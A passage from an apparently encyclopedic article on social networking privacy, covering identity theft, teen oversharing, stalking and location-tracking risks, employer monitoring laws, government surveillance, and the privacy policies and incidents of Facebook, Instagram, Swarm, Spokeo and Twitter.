have advised that users either do not display their number, or hide it from Facebook 'friends' they do not personally know.[52]Cases have also appeared of users having photographs stolen from social networking sites in order to assist in identity theft.[53]According to the Huffington Post, Bulgarian IT consultant Bogomil Shopov claimed in arecent blogto have purchased personal information on more than 1 million Facebook users, for the shockingly low price of US$5.00. The data reportedly included users' full names, email addresses, and links to their Facebook pages.[54]The following information could be used to steal the users' identities : Full names including middle name, date of birth, hometown, relationship status, residential information, other hobbies and interest. Among all other age groups, in general, the most vulnerable victims of private-information-sharing behavior are preteens and early teenagers. According to research, many teens report that social media and social networking services are important to building relationships and friendships. With this fact comes privacy concerns such as identity theft, stealing of personal information, and data usage by advertising companies. Besides from using social media to connect, teenagers use social networking services for political purposes and obtaining information. However, sometimes social media can become the place for harassment and disrespectful political debates that fuels resentment and rises privacy concerns.[11][55] There have been age restrictions put on numerous websites but how effective they are is debatable.[56]Findings have unveiled that informative opportunities regarding internet privacy as well as concerns from parents, teachers, and peers, play a significant role in impacting the internet user's behavior in regards to online privacy.[57][58]Additionally, other studies have also found that the heightening of adolescents' concern towards their privacy will also lead to a greater probability that they will utilize privacy-protecting behaviors.[59]In the technological culture that society is developing into, not only should adolescents' and parent's awareness be risen, but society as a whole should acknowledge the importance of online privacy.[60] Preteens and early teenagers are particularly susceptible to social pressures that encourage young people to reveal personal data when posting online. Teens often post information about their personal life, such as activities they are doing, sharing their current locations, who they spend time with, as well their thoughts and opinions. They tend to share this information because they do not want to feel left out or judged by other adolescents who are practicing these sharing activities already. Teens are motivated to keep themselves up to date with the latest gossip, current trends, and trending news and, in doing so they are allowing themselves to become victims of cyberbullying, stalking, and in the future, could potentially harm them when pursuing job opportunities, and in the context of privacy, become more inclined to share their private information to the public. This is concerning because preteens and teenagers are the least educated on how public social media is, how to protect themselves online, and the detrimental consequences that could come from sharing too much personal information online. As more and more young individuals are joining social media sites, they believe it is acceptable to post whatever they are thinking, as they don't realize the potential harm that information can do to them and how they are sacrificing their own privacy.[61]"Teens are sharing more information about themselves on social media sites than they did in the past."[62]Preteens and teenagers are sharing information on social media sites such as Facebook, Snapchat, Instagram, Twitter, Pinterest, and more by posting pictures and videos of themselves unaware of the privacy they are sacrificing.[63]Adolescents post their real name, birthdays, and email addresses to their social media profiles.[63]Children have less mobility than they have had in the past. Everything these teenagers do online is so they can stay in the loop of social opportunities, and the concern with this is that they do this in a way that is not only traceable but in a very persistent environment that motivates people to continue sharing information about themselves as well.[63]Consequently, they continue to use social media sites such as Facebook, despite knowing there exists potential privacy risks.[64] California is also taking steps to protect the privacy of some social media users from users’ own judgments. In 2013, California enacted a law that would require social media sites to allow young registered users to erase their own comments from sites.[65]This is a first step in the United States toward the “right to be forgotten” that has been debated around the world over the past decade. Most major social networking sites are committed to ensuring that use of their services are as safe as possible. However, due to the high content of personal information placed on social networking sites, as well as the ability to hide behind a pseudo-identity, such sites have become increasingly popular forsexual predatorsonline.[66]Further, lack of age verification mechanisms is a cause of concern in these social networking platforms.[67]However, it was also suggested that the majority of these simply transferred to using the services provided by Facebook.[68]While the numbers may remain small, it has been noted that the number of sexual predators caught using social networking sites has been increasing, and has now reached an almost weekly basis.[69]In worst cases children have become victims of pedophiles or lured to meet strangers. They say that sexual predators can lurk anonymously through the wormholes of cyberspace and access victim profiles online.[70]A number of highly publicized cases have demonstrated the threat posed for users, such asPeter Chapmanwho, under a false name, added over 3,000 friends and went on to rape and murder a 17-year-old girl in 2009.[71]In another case, a 12-year-old, Evergreen girl was safely found by the FBI with the help of Facebook, due to her mother learning of her daughter's conversation with a man she had met on the popular social networking application. The potential ability forstalkingusers on social networking sites has been noted and shared. Popular social networking sites make it easy to build a web of friends and acquaintances and share with them your photos, whereabouts, contact information, and interests without ever getting the chance to actually meet them. With the amount of information that users post about themselves online, it is easy for users to become a victim of stalking without even being aware of the risk. 63% of Facebook profiles are visible to the public, meaning if you Google someone's name and you add "+Facebook" in the search bar you pretty much will see most of the person profile.[72]A study of Facebook profiles from students at Carnegie Mellon University revealed that about 800 profiles included current resident and at least two classes being studied, theoretically allowing viewers to know the precise location of individuals at specific times.[50]AOLattracted controversy over its instant messenger AIM which permits users to add 'buddies' without their knowing, and therefore track when a user is online.[50]Concerns have also been raised over the relative ease for people to read private messages or e-mails on social networking sites.[73]Cyberstalking is a criminal offense that comes into play under state anti-stalking laws, slander laws, and harassment laws. A cyberstalking conviction can result in a restraining order, probation, or even criminal penalties against the assailant, including jail.[72] Some applications are explicitly centered on "cyber stalking." An application named "Creepy" can track a person's location on a map using photos uploaded to Twitter or Flickr. When a person uploads photos to a social networking site, others are able to track their most recent location. Some smartphones are able to embed the longitude and latitude coordinates into the photo and automatically send this information to the application. Anybody using the application can search for a specific person and then find their immediate location. This poses many potential threats to users who share their information with a large group of followers.[74] Facebook "Places," is a Facebook service, which publicizes user location information to the networking community. Users are allowed to "check-in" at various locations including retail stores, convenience stores, and restaurants. Also, users are able to create their own "place," disclosing personal information onto the Internet. This form oflocation trackingis automated and must be turned off manually. Various settings must be turned off and manipulated in order for the user to ensure privacy. According to epic.org, Facebook users are recommended to: (1) disable "Friends can check me in to Places," (2) customize "Places I Check In," (3) disable "People Here Now," and (4) uncheck "Places I've Visited.".[75]Moreover, the Federal Trade Commission has received two complaints in regards to Facebook's "unfair and deceptive" trade practices, which are used to target advertising sectors of the online community. "Places" tracks user location information and is used primarily for advertising purposes. Each location tracked allows third party advertisers to customize advertisements that suit one's interests. Currently, the Federal Trade Commissioner along with the Electronic Privacy Information Center are shedding light on the issues of location data tracking on social networking sites.[75] Unintentional fame can harm a person's character, reputation, relationships, chance of employment, and privacy- ultimately infringing upon a person's right to the pursuit of happiness. Many cases of unintentional fame have led its victims to take legal action. The right to be forgotten is a legal concept that includes removing one's information from the media that was once available to the public. The right to be forgotten is currently enforced in the European Union and Argentina, and has been recognized in various cases in the United States, particularly in the case of Melvin v. Reid. However, there is controversy surrounding the right to be forgotten in the United States as it conflicts with the public's right to know and the Constitution's First Amendment, restricting one's “right to freedom of speech and freedom of expression” (Amendment I). Privacy concerns have also been raised over a number of high-profile incidents which can be considered embarrassing for users. Various internet memes have been started on social networking sites or been used as a means towards their spread across the internet. In 2002, a Canadian teenager became known as theStar Wars Kidafter a video of him using a golf club as alight sabrewas posted on the internet without his consent. The video quickly became a hit, much to the embarrassment of the teenager, who claims to have suffered as a result.[76]Along with other incidents of videos being posted on social networking sites, this highlights the ability for personal information to be rapidly transferred between users. Issues relating to privacy and employment are becoming a concern with regards to social networking sites. As of 2008, it has been estimated byCareerBuilder.comthat one in five employers search social networking sites in order to screen potential candidates (increasing from only 11% in 2006).[77]For the majority of employers, such action is to acquire negative information about candidates. For example, 41% of managers considered information relating to candidates' alcohol and drug use to be a top concern.[77]Other concerns investigated via social networking sites included poor communication skills, inappropriate photographs, inaccurate qualifications and bad-mouthing former employers/colleagues.[77]However, 24% manager claimed that information found on a social networking site persuaded them to hire a candidate, suggesting that a user image can be used in a positive way. While there is little doubt that employers will continue to use social networking sites as a means of monitoring staff and screening potential candidates, it has been noted that such actions may be illegal under in jurisdictions. According to Workforce.com, employers who use Facebook or Myspace could potentially face legal action: If a potential employer uses a social networking site to check out a job candidate and then rejects that person based on what they see, he or she could be charged with discrimination.[78]On August 1, 2012, Illinois joined the state of Maryland (law passed in March 2012) in prohibiting employer access to social media web sites of their employees and prospective employees. A number of other states that are also considering such prohibitory legislation (California, Delaware, Massachusetts, Michigan, Minnesota, Missouri, New Jersey, New York, Ohio, South Carolina and Washington), as is the United States Congress. In April 2012, the Social Networking Online Protection Act (2012 H.R. 5050) was introduced in theUnited States House of Representatives, and the Password Protection Act of 2012 (2012 S. 3074) was introduced in theUnited States Senatein May 2012, which prohibit employers from requiring access to their employees' social media web sites.[79] With the recent concerns about new technologies, the United States is now developing laws and regulations to protect certain aspects of people's information on different medias.[CR4] For example, 12 states in the US currently have laws specifically restricting employers from demanding access to their employees’ social media sites when those sites are not fully public.[80](The states that have passed these laws are Arkansas, California, Colorado, Illinois, Maryland, Michigan, New Jersey, New Mexico, Nevada, Oregon, Utah, and Washington.)[81] Monitoring of social networking sites is not limited to potential workers. Issues relating to privacy are becoming an increasing concern for those currently in employment. A number of high-profile cases have appeared in which individuals have been sacked for posting comments on social networking which have been considered disparaging to their current employers or fellow workers. In 2009, sixteen-year-old Kimberley Swann was sacked from her position at Ivell Marketing and Logistics Limited after describing her job as 'boring'.[82]In 2008, Virgin Atlantic sacked thirteen cabin crew staff, after it emerged they used had criticized the company's safety standards and called passengers 'chavs' on Facebook.[83]There is no federal law that we are aware of that an employer is breaking by monitoring employees on social networking sites. In fact, employers can even hire third-party companies to monitor online employee activity for them. According to anarticle by Read Write Webemployers use the service to "make sure that employees don't leak sensitive information on social networks or engage in any behavior that could damage a company's reputation."[51]While employers may have found such usages of social networking sites convenient, complaints have been put forward by civil liberties groups and trade unions on the invasive approach adopted by many employers. In response to the Kimberley Swann case, Brendan Barber, of theTUCunion stated that: Most employers wouldn't dream of following their staff down the pub to see if they were sounding off about work to their friends," he said. "Just because snooping on personal conversations is possible these days, it doesn't make it healthy." Monitoring of staff's social networking activities is also becoming an increasingly common method of ensuring that employees are not browsing websites during work hours. It was estimated in 2010 that an average of two million employees spent over an hour a day on social networking sites, costing potentially £14 billion.[84] A male burglar inOrange County, Californiain 2015 targeted 33 women by using GPS data embedded on Facebook and Instagram photos, and stole $250,000 in electronics and jewelry, along with his victims’ underwear and bras.[85]A former burglar probed social media to determine when their victims were away, by looking for photos suggesting a vacation. Instagram posts showing expensive new products have been used by thieves to find victims, along with posts featuring new homes showing their address.[86]A survey in theUnited Kingdomshowed that 78% of burglars have used Facebook and Twitter to find victims.[87][88][89] Social networks are designed for individuals to socially interact with other people over the Internet. However, some individuals engage in undesirable online social behaviors, which negatively impacts other people's online experiences. It has created a wide range of online interpersonalvictimization. Some studies have shown that social network victimization appears largely in adolescent and teens, and the type of victimization includes sexual advances and harassment.[90]Recent research has reported approximately 9% of online victimization involves social network activities.[90]It has been noted that many of these victims are girls who have been sexually victimized over these social network sites.[90]Research concludes that many of social network victimizations are associated with user behaviors and interaction with one another. Negative social behaviors such as aggressive attitudes and discussing sexual related topics motivate the offenders to achieve their goals.[90]All in all, positive online social behaviors is promoted to help reduce and avoid online victimization. While the concept of a worldwide communicative network seems to adhere to the public sphere model, market forces control access to such a resource. In 2010, investigation by The Wall Street Journal found that many of the most popular applications on Facebook were transmitting identifying information about users and their friends to advertisers and internet tracking companies, which is a violation of Facebook's privacy policy.[91]The Wall Street Journal analyzed the ten most popular Facebook apps, including Zynga's FarmVille with 57 million users, and Zynga's Mafia Wars with 21.9 million users, and found that they were transmitting Facebook user IDs to data aggregators.[91]Every online move leaves cyber footprints that are rapidly becoming fodder for research without people ever realizing it. Using social media for academic research is accelerating and raising ethical concerns along the way, as vast amounts of information collected by private companies — including Google, Microsoft, Facebook and Twitter — are giving new insight into all aspects of everyday life. Our social media "audience" is bigger than we actually know; our followers or friends aren't the only ones that can see information about us. Social media sites are collecting data from us just by searching something such as "favorite restaurant" on our search engine. Facebook is transformed from a public space to a behavioral laboratory," says the study, which cites a Harvard-based research project of 1,700 college-based Facebook users in which it became possible to "deanonymize parts of the data set," or cross-reference anonymous data to make student identification possible.[92]Some of Facebook's research on user behavior found that 71% of people drafted at least one post that they never posted.[92]Another analyzed 400,000 posts and found that children's communication with parents decreases in frequency from age 13 but then rises when they move out.[92] The FBI has dedicated undercover agents on Facebook, Twitter, MySpace,LinkedIn. One example of investigators using Facebook to nab a criminal is the case of Maxi Sopo. Charged with bank fraud, and having escaped to Mexico, he was nowhere to be found until he started posting on Facebook. Although his profile was private, his list of friends was not, and through this vector, where he met a former official of the Justice Department, he was eventually caught.[93][94] In recent years, some state and local law enforcement agencies have also begun to rely on social media websites as resources. Although obtaining records of information not shared publicly by or about site users often requires a subpoena, public pages on sites such as Facebook and MySpace offer access to personal information that can be valuable to law enforcement.[95]Police departments have reported using social media websites to assist in investigations, locate and track suspects, and monitor gang activity.[96][97] On October 18, 2017, the Department of Homeland Security (DHS) was scheduled to begin using personal information collected using social media platforms to screen immigrants arriving in the U.S. The department made this new measure known in a posting to the Federal Register in September 2017, noting that “...social media handles, aliases, associated identifiable information and search results...” would be included in an applicant's immigration file.[98]This announcement, which was made relatively quietly, has received criticism from privacy advocates. The Department of Homeland Security issued a statement in late September 2017 asserting that the planned use of social media is nothing new, with one department spokesperson saying DHS has been using social media to collect information for years. According to a statement made to National Public Radio, DHS uses “...social media handles, aliases, associated identifiable information, and search results” to keep updated records on persons of interest.[99]According to the DHS, the posting to the Federal Register was an effort to be transparent regarding information about social media that is already being collected from immigrants. Government use of SMMS, or “Social Media Monitoring Software", may geographically track us as we communicate. It can chart out our relationships, networks, and associations. It can monitor protests, identify the leaders of political and social movements, and measure our influence.”[100]SMMS is also a growing industry. SMMS “products like XI Social Discovery,Geofeedia,Dataminr, Dunami, and SocioSpyder (to name just a few) are being purchased in droves by Fortune 500 companies, politicians, law enforcement, federal agencies, defense contractors, and the military. Even the CIA has a venture fund,In-Q-Tel, that invests in SMMS technology.”[100] The idea of the 'mob rule' can be described as a situation in which control is held by those outside the conventional or lawful realm. In response to theNews International phone hacking scandalinvolvingNews of the Worldin the United Kingdom, a report was written to enact new media privacy regulations. The British author of theLeveson Reporton the ethics of the British press,Lord Justice Leveson, has drawn attention to the need to take action on protecting privacy on the internet. This movement is described by Lord Justice Leveson as a global megaphone for gossip: "There is not only a danger of trial by Twitter, but also of an unending punishment, and no prospect of rehabilitation, by Google".[101] Foursquare, Facebook, Loopt are application which allow users to check- in and these capabilities allows a user to share their current location information to their connection. Some of them even update their travel plans on social networking applications. However, the disclosure of location information within these networks can cause privacy concerns among mobile users. Foursquare defines another framework of action for the user. It appears to be in the interest of Foursquare that users provide many personal data that are set as public. This is illustrated, among others, by the fact that, although all the respondents want high control over the (location) privacy settings, almost none of them ever checked the Foursquare privacy settings before.[102]Although there are algorithms using encryption, k-anonymity and noise injection algorithms, its better to understand how the location sharing works in these applications to see if they have good algorithms in place to protect location privacy.[103] Another privacy issue with social networks is the privacy agreement. The privacy agreement states that the social network owns all of the content that users upload. This includes pictures, videos, and messages are all stored in the social networks database even if the user decides to terminate his or her account.[104] Privacy agreements oftentimes say that they can track a user's location and activity based on the device used for the site. For example, the privacy agreement for Facebook states that "all devices that a person uses to access Facebook are recorded such as IP addresses, phone numbers, operating system and evenGPSlocations".[105]One main concern about privacy agreements are the length, because they take a lot of time to fully read and understand. Most privacy agreements state the most important information at the end because it is assumed that people will not read it completely. The ethical dilemma lies in that upon the agreement to register for SNSs, the personal information disclosed is legally accessible and managed by the sites privately established online security operators and operating systems; leaving access of user data to be "under the discretion" of the site(s) operators. Giving rise to the moral obligation and responsibility of the sites operators to maintain private information to be within user control. However, due to the legality of outsourcing of user data upon registration- without prior discretion, data outsourcing has been frequented by SNSs operating systems- regardless of user privacy settings.[106] Data outsourcing has been proven to be consistently exploited since the emergence of SNSs. Employers have often been found to hire individuals or companies to search deep into the SNSs user database to find "less than pleasant" information regarding applicants during the review process.[107] One of the main concerns that people have with their security is the lack of visibility that policies and settings have in the social networks. It is often located in areas hard to see like the top left or right of the screen. Another concern is the lack of information that users get from the companies when there is a change in their policies. They always inform users about new updates, but it is difficult to get information about these changes.[108] Most social networking sites require users to agree to Terms of Use policies before they use their services. Controversially, these Terms of Use declarations that users must agree to often contain clauses permitting social networking operators to store data on users, or even share it with third parties. Facebook has attracted attention over its policies regarding data storage, such as making it difficult to delete an account, holding onto data after an account is de-activated and being caught sharing personal data with third parties.[109]This section explains how to read the privacy statement in terms and conditions while signing up for any social networking site.[110] What to look for in the privacy policy: The answers to these questions will give an indication of how safe the social networking site is. There are people out there who want—and will do just about anything—to get someone's private information. It's essential to realize that it's difficult to keep your privacy secured all the time.[111]Among other factors, it has been observed that data loss is correlated positively with risky online behavior and forgoing the necessary antivirus and anti spyware programs to defend against breaches of private information via the internet.[112] Logging off after every session can help protect account security. It is dangerous to keep your device logged on since others may have access to your social profiles while you are not paying attention.[113]Full names and addresses are typically considered personal information. Children's safety may be compromised if their parents post their whereabouts in a site where others know who their real identities are.[114] Read the social networking site's fine prints. Many sites push its users to agree to terms that are best for the sites—not the users.[111]Users should be aware about the terms in case of emergencies. Exactly how to read the terms are explained above at "Reading a Privacy Statement in Terms and Conditions" part.Make sure the social networking site is safe before sharing information. Users shouldn't be sharing information if they don't know who are using the websites since their personally identifiable information could be exposed to other users of the site.[114]Be familiar with the privacy protection provided. Users should take the extra time to get to know the privacy protection systems of various social networks they are or will be using. Only friends should be allowed to access their information.[113]Check the privacy or security settings on every social networking site that they might have to use.[115] Encrypt devices. Users should use complex passwords on their computers and cell phones and change them from time to time. This will protect users' information in case these devices are stolen.[113]Install Anti-virus software. Others would be able to use viruses and other ways to invade a user's computer if he or she installed something unsafe.[116]Use devices that can disable camera, microphone, which mostly used for privacy invasion. The users' privacy may be threatened by any actions. Following actions needs special attention.(1) Adding a new friend. Facebook reports 8.7% of its total profiles are fake. A user should be sure about who the person is before adding it as a new friend.[113](2) Clicking on links. Many links which looks attractive like gift cards are specially designed by malicious users. Clicking on these links may result in losing personal information or money.[113](3) Think twice about posting revealing photos. A revealing photo could attract the attention of potential criminals.[111] Facebook has been scrutinized for a variety of privacy concerns due to changes in its privacy settings on the site generally over time as well as privacy concerns within Facebook applications. Mark Zuckerberg, CEO of Facebook, first launched Facebook[117]in 2004, it was focused on universities and only those with .edu address could open an account. Furthermore, only those within one's university network could see their page. Some argue that initial users were much more willing to share private information for these reasons. As time went on, Facebook became more public allowing those outside universities, and furthermore, those without a specific network, to join and see pages of those in networks that were not their own. In 2006 Facebook introduced the News Feed, a feature that would highlight recent friend activity. By 2009, Facebook made "more and more information public by default". For example, in December 2009, "Facebook drastically changed its privacy policies, allowing users to see each others' lists of friends, even if users had previously indicated they wanted to keep these lists private". Also, "the new settings made photos publicly available by default, often without users' knowledge".[118] Facebook recently updated its profile format allowing for people who are not "friends" of others to view personal information about other users, even when the profile is set to private. However, As of January 18, 2011 Facebook changed its decision to make home addresses and telephone numbers accessible to third party members, but it is still possible for third party members to have access to less exact personal information, like one's hometown and employment, if the user has entered the information into Facebook. EPIC Executive Director Marc Rotenberg said "Facebook is trying to blur the line between public and private information. And the request for permission does not make clear to the user why the information is needed or how it will be used."[119] Breakup Notifieris an example of a Facebook "cyberstalking"[120]app, which was taken down on 23 February 2011.[121]The app was later unblocked.[122]The application notifies the user when the person they selected changes their relationship status.[123]The concept became very popular, with the site attracting 700,000 visits in the first 36 hours and the app being downloaded 40,000 times. Before the app was blocked, it had more than 3.6 million downloads and 9,000 Facebook likes.[120][121] In 2008, four years after the first introduction of Facebook, Facebook created an option to permanently delete information. Until then, the only option was to deactivate one's Facebook account, which still left the user's information within Facebook servers. After thousands of users complaints, Facebook obliged and created a tool which was located in the Help Section but later removed. To locate the tool to permanently delete a user's Facebook, he or she must manually search through Facebook's Help section by entering the request to delete the Facebook in the search box. Only then will a link be provided to prompt the user to delete his or her profile.[124] These new privacy settings enraged some users, one of whom claimed, "Facebook is trying to dupe hundreds of millions of users they've spent years attracting into exposing their data for Facebook's personal gain." However, other features like the News Feed faced an initial backlash but later became a fundamental and very much appreciated part of the Facebook experience. In response to user complaints, Facebook continued to add more and more privacy settings resulting in "50 settings and more than 170 privacy options." However, many users complained that the new privacy settings were too confusing and were aimed at increasing the amount of public information on Facebook. Facebook management responded that "there are always trade offs between providing comprehensive and precise granular controls and offering simple tools that may be broad and blunt."[118]It appears as though users sometimes do not pay enough attention to privacy settings and arguably allow their information to be public even though it is possible to make it private. Studies have shown that users actually pay little attention to "permissions they give to third party apps."[125] Most users are not aware that they can modify the privacy settings and unless they modify them, their information is open to the public. On Facebook privacy settings can be accessed via the drop down menu under account in the top right corner. There users can change who can view their profile and what information can be displayed on their profile.[104]In most cases profiles are open to either "all my network and friends" or "all of my friends." Also, information that shows on a user's profile such as birthday, religious views, and relationship status can be removed via the privacy settings.[126]If a user is under 13 years old they are not able to make a Facebook or a MySpace account, however, this is not regulated.[104] Although Zuckerberg, the Facebook CEO, and others in the management team usually respond in some manner to user concerns, they have been unapologetic about the trend towards less privacy. They have stated that they must continually "be innovating and updating what our system is to reflect what the current social norms are." Their statements suggest that the Internet is becoming a more open, public space, and changes in Facebook privacy settings reflect this. However, Zuckerberg did admit that in the initial release of the News Feed, they "did a bad job of explaining what the new features were and an even worse job of giving you control of them."[118] Facebook's privacy settings have greatly evolved and are continuing to change over time. Zuckerberg "believes the age of privacy is 'over,' and that norms have evolved considerably since he first co-founded the social networking site".[127]Additionally, Facebook has been under fire for keeping track of one's Internet usage whether users are logged into the social media site or not. A user may notice personalized ads under the 'Sponsored' area of the page. "The company uses cookies to log data such as the date, time, URL, and your IP address whenever you visit a site that has a Facebook plug-in, such as a 'Like' button."[128]Facebook claims this data is used to help improve one's experience on the website and to protect against 'malicious' activity. Another issue of privacy that Facebook uses is the newfacial recognition software. This feature includes the software to identify photos that users are tagged in by developing a template based on one's facial features.What is the face recognition setting on Facebook and how does it work? | Facebook Help Center Similar to Rotenberg's claim that Facebook users are unclear of how or why their information has gone public, recently the Federal Trade Commission and Commerce Department have become involved. The Federal Trade Commission has recently released a report claiming that Internet companies and other industries will soon need to increase their protection for online users. Because online users often unknowingly opt in on making their information public, the FTC is urging Internet companies to make privacy notes simpler and easier for the public to understand, therefore increasing their option to opt out. Perhaps this new policy should also be implemented in the Facebook world. The Commerce Department claims that Americans, "have been ill-served by a patchwork of privacy laws that contain broad gaps".[129]Because of these broad gaps, Americans are more susceptible to identity theft and having their online activity tracked by others. The illegal activities on Facebook are very widespread, in particular, phishing attacks, allowing attackers to steal other people's passwords. The Facebook users are led to land on a page where they are asked for their login information, and their personal information is stolen in that way. According to the news fromPC World Business Centerwhich was published on April 22, 2010, we can know that a hacker named Kirllos illegally stole and sold 1.5 million Facebook IDs to some business companies who want to attract potential customers by using advertisements on Facebook. Their illegal approach is that they used accounts which were bought from hackers to send advertisements to friends of users. When friends see the advertisements, they will have opinion about them, because "People will follow it because they believe it was a friend that told them to go to this link," said Randy Abrams, director of technical education with security vendor Eset.[130]There were 2.2232% of the population on Facebook that believed or followed the advertisements of their friends.[131]Even though the percentage is small, the amount of overall users on Facebook is more than 400 million worldwide. The influence of advertisements on Facebook is so huge and obvious. According to the blog of Alan who just posted advertisements on the Facebook, he earned $300 over the 4 days. That means he can earn $3 for every $1 put into it.[132]The huge profit attracts hackers to steal users' login information on Facebook, and business people who want to buy accounts from hackers send advertisements to users' friends on Facebook. A leaked document from Facebook has revealed that the company was able to identify "insecure, worthless, stressed or defeated" emotions, especially in teenagers, and then proceeded to inform advertisers.[133]While similar issues have arisen in thepast, this continues to make individuals’ emotional states seem more like a commodity.[133]They are able to target certain age groups depending on the time that their advertisements appear.[133] Recently, there have been allegations made againstFacebookaccusing the app of listening in on its users through their smartphone's microphone in order to gather information for advertisers. These rumors have been proven to be false as well as impossible. For one, because it does not have a specific buzzword to listen for like theAmazon Echo, Facebook would have to record everything its users say. This kind of “constant audio surveillance would produce about 33 times more data daily than Facebook currently consumes”.[134]Additionally, it would become immediately apparent to the user as their phone's battery life would be swiftly drained by the amount of power it would take to record every conversation. Finally, it is clear that Facebook doesn't need to listen in on its users’ conversations because it already has plenty of access to their data and internet search history throughcookies. Facebook specifically states in their Cookies Policy that they use cookies to help display ads that will peak the users interest. They then use this information to help make recommendations for numerous businesses, organizations, associations, etc. to individuals who may be interested in the products, services or causes they offer.[135] Security Breach In September 2018, there was an incident of a security breach within Facebook. Hackers were able to access and steal personal information in nearly half of the 30 million accounts. The company initially believed that even more, around 50 million users, were affected in an attack that gave the hackers control of accounts.[136] A study was conducted at Northeastern University by Alan Mislove and his colleagues at the Max Planck Institute for Software Systems, where an algorithm was created to try and discover personal attributes of a Facebook user by looking at their friend's list. They looked for information such as high school and college attended, major, hometown, graduation year and even what dorm a student may have lived in. The study revealed that only 5% of people thought to change their friend's list to private. For other users, 58% displayed university attended, 42% revealed employers, 35% revealed interests and 19% gave viewers public access to where they were located. Due to the correlation of Facebook friends and universities they attend, it was easy to discover where a Facebook user was based on their list of friends. This fact is one that has become very useful to advertisers targeting their audiences but is also a big risk for the privacy of all those with Facebook accounts.[137] Recently, Facebook knowingly agreed and facilitated a controversial experiment; the experiment blatantly bypassed user privacy and demonstrates the dangers and complex ethical nature of the current networking management system. The "one week study in January of 2012" where over 600,000 users were randomly selected to unknowingly partake in a study to determine the effect of "emotional alteration" by Facebook posts.[138]Apart from the ethical issue of conducting such a study with human emotion in the first place, this is just one of the means in which data outsourcing has been used as a breach of privacy without user disclosure.[139][107] Several issues about Facebook are due to privacy concerns. An article titled "Facebook and Online Privacy: Attitudes, Behaviors, and Unintended Consequences" examines the awareness that Facebook users have on privacy issues. This study shows that the gratifications of using Facebook tend to outweigh the perceived threats to privacy. The most common strategy for privacy protection—decreasing profile visibility through restricting access to friends—is also a very weak mechanism; a quick fix rather than a systematic approach to protecting privacy.[140]This study suggests that more education about privacy on Facebook would be beneficial to the majority of the Facebook user population. The study also offers the perspective that most users do not realize that restricting access to their data does not sufficiently address the risks resulting from the amount, quality, and persistence of data they provide. Facebook users in our study report familiarity and use of privacy settings, they are still accepting people as "friends" that they have only heard of through others or do not know at all and, therefore, most have very large groups of "friends" that have access to widely uploaded information such as full names, birthdates, hometowns, and many pictures.[140]This study suggests that social network privacy does not merely exist within the realm of privacy settings, but privacy control is much within the hands of the user. Commentators have noted that online social networking poses a fundamental challenge to the theory of privacy as control. The stakes have been raised because digital technologies lack "the relative transience of human memory," and can be trolled or data mined for information.[141]For users who are unaware of all privacy concerns and issues, further education on the safety of disclosing certain types of information on Facebook is highly recommended. Instagramtracks users' photos even if they do not post them using a geotag. This is through the information within metadata, which is in all photos. Metadata contains information like the lens type, location, time, and more of the photo. Users can be tracked through metadata without the use of geotags. The app geotags an uploaded image regardless of whether the user chose to share its location or not. Therefore, anybody can view the exact location where an image was uploaded on a map. This is concerning due to the fact that most people upload photos from their home or other locations they frequent a lot, and the fact that locations are so easily shared raises privacy concerns of stalking and sexual predators being able to find their target in person after discovering them online.[142]The new Search function on Instagram combines the search of places, people, and tags to look at nearly any location on earth, allowing them to scout out a vacation spot, look inside a restaurant, and even to experience an event like they were there in person.[143]The privacy implications of this fact is that people and companies can now see into every corner of the world, culture, and people's private lives. Additionally, this is concerning for individual privacy, because when someone searches through these features on Instagram for a specific location or place, Instagram shows them the personal photos that their users have posted, along with the likes and comments on that photo regardless of whether the poster's account is private or not. With these features, completely random people, businesses, and governments can see aspects of Instagram users' private lives. The Search and Explore pages that collect data based on user tagging illustrates how Instagram was able to create value out of thedatabasesof information they collect on users throughout their business operations.[143] Swarmis a mobile app that lets users check-in to a location and potentially make plans and set up future meetings with people nearby. This app has made it easier for people in online communities to share their locations, as well as interact with others in this community through collecting rewards such as coins and stickers through competitions with other users.[144]If a user is on Swarm, their exact location may be broadcast even if they didn't select their location to be "checked-in." When users turn on their "Neighborhood Sharing" feature, their location is shared as the specific intersection that they are at, and this location in current time can be viewed simply by tapping their profile image.[142]This is concerning because Swarm users may believe they are being discreet by sharing only which neighborhood they are in, while in fact they are sharing the exact pinpoint of their location.[142]The privacy implications of this is that people are inadvertently sharing their exact location when they do not know that they are. This plays into the privacy concerns of social media in general, because it makes it easier for other users as well as the companies this location data is shared with to track Swarm members. This tracking makes it easier for people to find their next targets for identity theft, stalking, and sexual harassment. Spokeois a "people-related" search engine with results compiled through data aggregation. The site contains information such as age, relationship status, estimated personal wealth, immediate family members and home address of individual people. This information is compiled through what is already on the internet or in other public records, but the website does not guarantee accuracy. Spokeo has been faced with potential class action lawsuits from people who claim that the organization breaches theFair Credit Reporting Act. In September, 2010, Jennifer Purcell claimed that the FCRA was violated by Spokeo marketing her personal information. Her case is pending in court. Also in 2010, Thomas Robins claimed that his personal information on the website was inaccurate and he was unable to edit it for accuracy. The case was dismissed because Robins did not claim that the site directly caused him actual harm.[145]On February 15, 2011, Robins filed another suit, this time stating Spokeo has caused him "imminent and ongoing" harm.[146] In January 2011, the US government obtained a court order to force the social networking site, Twitter, to reveal information applicable surrounding certain subscribers involved in theWikiLeakscases. This outcome of this case is questionable because it deals with the user's First Amendment rights. Twitter moved to reverse the court order, and supported the idea that internet users should be notified and given an opportunity to defend their constitutional rights in court before their rights are compromised.[147] Twitter's privacy policy states that information is collected through their different web sites, application, SMS, services, APIs, and other third parties. When the user uses Twitter's service they consent to the collection, transfer, storage, manipulation, disclosure, and other uses of this information. In order to create a Twitter account, one must give a name, username, password, and email address. Any other information added to one's profile is completely voluntary.[148]Twitter's servers automatically record data such asIP address, browser type, the referring domain, pages visited, mobile carrier, device and application IDS, and search terms. Any common account identifiers such as full IP address or username will be removed or deleted after 18 months.[149] Twitter allows people to share information with their followers. Any messages that are not switched from the default privacy setting are public, and thus can be viewed by anyone with a Twitter account. The most recent 20 tweets are posted on a public timeline.[150]Despite Twitter's best efforts to protect their users privacy, personal information can still be dangerous to share. There have been incidents of leaked tweets on Twitter. Leaked tweets are tweets that have been published from a private account but have been made public. This occurs when friends of someone with a private account retweet, or copy and paste, that person's tweet and so on and so forth until the tweet is made public. This can make private information public, and could possibly be dangerous.[151] Another issue involving privacy on Twitter deals with users unknowingly disclosing their information through tweets. Twitter has location services attached to tweets, which some users don't even know are enabled. Many users tweet about being at home and attach their location to their tweet, revealing their personal home address. This information is represented as a latitude and longitude, which is completely open for any website or application to access. People also tweet about going on vacation and giving the times and places of where they are going and how long they will be gone for. This has led to numerous break ins and robberies.[152]Twitter users can avoid location services by disabling them in their privacy settings. Teachers' privacy on MySpace has created controversy across the world. They are 